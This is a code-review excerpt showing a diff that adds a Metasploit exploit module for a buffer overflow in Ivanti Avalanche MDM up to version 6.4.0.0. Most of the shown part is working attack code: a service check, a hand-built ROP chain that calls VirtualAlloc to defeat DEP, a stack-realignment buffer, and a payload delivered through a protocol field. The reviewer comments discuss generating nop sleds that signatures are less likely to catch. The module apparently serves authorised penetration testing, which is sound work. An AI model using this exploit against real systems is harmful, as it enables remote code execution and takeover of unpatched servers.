modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb

```diff
@@ -0,0 +1,160 @@
+        },
+        'Targets' => [['Ivanti Avalanche <= v6.4.0.0', {}]],
+        'Privileged' => true,
+        'DisclosureDate' => '2023-08-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The remote port', 1777])
+      ]
+    )
+  end
+
+  def check
+    begin
+      connect
+    rescue StandardError
+      print_error('Could not connect to target!')
+      return Exploit::CheckCode::Safe
+    end
+    res = sock.get_once
+
+    if res =~ /p\.guid/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    expected_payload_size = 622
+
+    # This is a custom ROP chain for byspassing DEP via VirtualAlloc
+    rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
+    rop_chain += [0x00001000].pack('V')  # flAllocationType
+    rop_chain += [0x00499ac0].pack('V')  # pop eax ; ret ;
+    rop_chain += [0x0056a208].pack('V')  # VirtualAlloc IAT entry
+    rop_chain += [0x00566650].pack('V')  # pop ecx ; ret ;
+    rop_chain += [0x00000040].pack('V')  # flProtect
+    rop_chain += [0x0054b079].pack('V')  # pop ebx ; ret ;
+    rop_chain += [0x00000320].pack('V')  # dwSize
+    rop_chain += [0x00402323].pack('V')  # pop ebp; ret
+    rop_chain += [0x0055642a].pack('V')  # pop eax; ret
+    rop_chain += [0x0052ad90].pack('V')  # pop esi; ret;
+    rop_chain += [0x0042792f].pack('V')  # jmp [eax]
+    rop_chain += [0x00521907].pack('V')  # pop edi ; ret ;
+    rop_chain += [0x00568968].pack('V')  # ret ;
+    rop_chain += [0x004995ab].pack('V')  # pushad ; ret ;
+    rop_chain += [0x00499c20].pack('V')  # push esp ; ret
+
+    # Because of the compiler optimized `qmemcpy`
+    # we are not able to directly return to out smashed stack.
+    # This buffer re-arranges the entire stack for excaping
+    # the longass function without crashing.
+    buf = ('A' * 136)
+    buf += [0].pack('V')             # set empty register
+    buf += [0].pack('V')             # set empty register
+    buf += [0].pack('V')             # stack alignment buffer
+    buf += [0].pack('V')             # stack alignment buffer
+    buf += [0x00511a80].pack('V')    # ESP -> $(rop: "add esp, 0x10 ; ret ;")
+    buf += [0x00583900].pack('V')    # .data section scratch space
+    buf += [0x00583900].pack('V')    # .data section scratch space
+    buf += [0x00585858].pack('V')    # .data section scratch space
+    buf += [0x00585857].pack('V')    # .data section scratch space
+
+    # ==================
+    name1 = 'h.mid'
+    value1 = "\x30"
+
+    name2 = 'h.cmd'
+    value2 = "\x31\x39"
+
+    name3 = 'p.waitprofile'
+    value3 = (buf + rop_chain + ("\x90" * (expected_payload_size - payload.encoded.length)) + payload.encoded)
```

Comment:
nit: I think™ that metasm is able to generate nopsleds

Reply:
Yeah, and generally better than static bytes which can be used in signatures if offsets are known.

Reply:
> nit: I think™ that metasm is able to generate nopsleds

I think `make_nops` is a better choice. `Metasm` just makes it too long.